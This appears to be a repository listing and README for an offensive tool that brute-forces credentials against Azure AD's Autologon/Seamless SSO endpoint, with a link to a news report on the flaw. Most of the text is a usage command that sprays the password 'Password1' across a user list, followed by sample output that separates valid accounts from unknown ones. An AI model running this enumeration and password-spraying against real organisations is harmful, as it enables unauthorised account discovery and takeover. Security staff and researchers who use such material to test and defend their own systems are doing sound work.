AzureAD_Autologon_Brute
AzureAD_Autologon_Brute copied to clipboard
Published
20 hours ago •
nyxgeek
nyxgeek
Brute force attack tool for Azure AD Autologon/Seamless SSO - Source: https://arstechnica.com/information-technology/2021/09/new-azure-active-directory-password-brute-forcing-flaw-has-no-fix/
AzureAD_Autologon_Brute
Brute force attack tool for Azure AD Autologon
https://arstechnica.com/information-technology/2021/09/new-azure-active-directory-password-brute-forcing-flaw-has-no-fix/
Usage:
python3 azuread_autologon_brute.py -d intranet.directory -U users.txt -p Password1
[~/AzureAD_Autologon_Brute] # python3 azuread_autologon_brute.py -d intranet.directory -U users.txt -p Password1
Domain is intranet.directory
Setting password as: Password1
Reading users from file: users.txt
+-----------------------------------------+
| AzureAD AutoLogon Brute |
| 2021.09.30 @nyxgeek - TrustedSec |
+-----------------------------------------+
[-] Username not found:[email protected]:Password1
[+] VALID USERNAME, invalid password :[email protected]:Password1
[-] Username not found:[email protected]:Password1
[-] Username not found:[email protected]:Password1
[-] Username not found:[email protected]:Password1
[-] Username not found:[email protected]:Password1
[+] VALID USERNAME, invalid password :[email protected]:Password1
[-] Username not found:[email protected]:Password1
[+] VALID USERNAME, invalid password :[email protected]:Password1
[-] Username not found:[email protected]:Password1
nyxgeek